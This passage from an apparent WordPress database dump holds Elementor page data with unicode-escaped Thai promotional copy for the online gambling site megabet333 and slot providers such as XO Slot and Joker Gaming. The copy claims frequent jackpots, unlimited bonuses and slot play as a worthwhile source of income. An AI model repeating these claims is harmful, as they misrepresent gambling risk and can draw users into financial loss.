\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e15\\u0e34\\u0e14\\u0e43\\u0e08\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>XO Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e15\\u0e33\\u0e19\\u0e32\\u0e19\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e23\\u0e38\\u0e48\\u0e19\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e22\\u0e31\\u0e07\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e02\\u0e32\\u0e14\\u0e1b\\u0e32\\u0e01\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d XO Slot \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e07\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e32\\u0e19\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e14\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e16\\u0e49\\u0e27\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e02\\u0e2d\\u0e07 XO Slot \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e17\\u0e35\\u0e48\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e08\\u0e19\\u0e16\\u0e39\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32 \\u201c\\u0e04\\u0e48\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e0a\\u0e04\\u201d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 Roma, Supreme Caishen \\u0e2b\\u0e23\\u0e37\\u0e2d Lucky Panda \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e25\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e15\\u0e49\\u0e2d\\u0e07 XO Slot \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>Joker Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e15\\u0e01\\u0e41\\u0e23\\u0e07 \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e38\\u0e01\\u0e41\\u0e19\\u0e27 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d Joker Gaming \\u0e17\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e04\\u0e27\\u0e49\\u0e32\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e0a\\u0e48\\u0e19 Roma X, Queen 2, \\u0e41\\u0e25\\u0e30 Joker Madness \\u0e25\\u0e49\\u0e27\\u0e19\\u0e21\\u0e35\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e15\\u0e49\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e20\\u0e32\\u0e29\\u0e32\\u0e44\\u0e17\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07\\u0e14\\u0e38\\u0e14\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e04\\u0e27\\u0e23\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1128,142,'_thumbnail_id','60'),(1129,142,'_elementor_edit_mode','builder'),(1130,142,'_elementor_template_type','wp-page'),(1131,142,'_elementor_version','3.32.5'),(1132,142,'_elementor_pro_version','3.32.3'),(1133,142,'_wp_page_template','default'),(1134,142,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1135,142,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 3 \\u0e27\\u0e34\\u0e18\\u0e35\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e37\\u0e48\\u0e19\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e22\\u0e39\\u0e2a\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e21\\u0e48\\u0e22\\u0e32\\u0e01 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b 